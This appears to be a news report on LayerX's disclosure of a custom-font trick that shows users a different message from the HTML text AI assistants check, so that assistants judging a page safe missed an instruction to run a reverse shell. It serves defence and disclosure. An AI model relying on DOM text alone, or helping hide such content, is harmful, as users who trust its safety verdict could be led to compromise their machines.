A recent cyber attack has highlighted a structural disconnection between the HTML text and what users actually see in their browsers, allowing attackers to send malicious instructions that go unnoticed by artificial intelligence assistants. This finding was presented by LayerX, a cybersecurity company, which demonstrated its technique using a fake Bioshock fanfiction site. By using a custom font, the attackers were able to hide a malicious message in seemingly harmless content.
Hidden Threats in HTML
The attack revealed that, although AI assistants like ChatGPT and Claude were examining the underlying HTML for threats, they lacked the ability to identify hidden content that appeared safe at first glance. In this case, the malicious text urged users to execute a reverse shell on their machines, while the visible text was a set of unreadable characters.
LayerX has pointed out that this vulnerability does not require the use of JavaScript or exploit kits, revealing a flaw in how AI tools analyze the security of web pages. While browsers present information in a designed manner, AIs treat the text of the DOM as the complete representation of what is shown to the user, leaving a gap that attackers can exploit.

In response to this threat, LayerX recommends that AI providers implement dual rendering analysis and treat custom fonts as potential threat surfaces. Additionally, it is vital that these tools avoid making security judgments without having verified the full context of the page. So far, Microsoft has stood out as the only provider that has fully addressed the issue following LayerX’s responsible disclosure in December 2025.
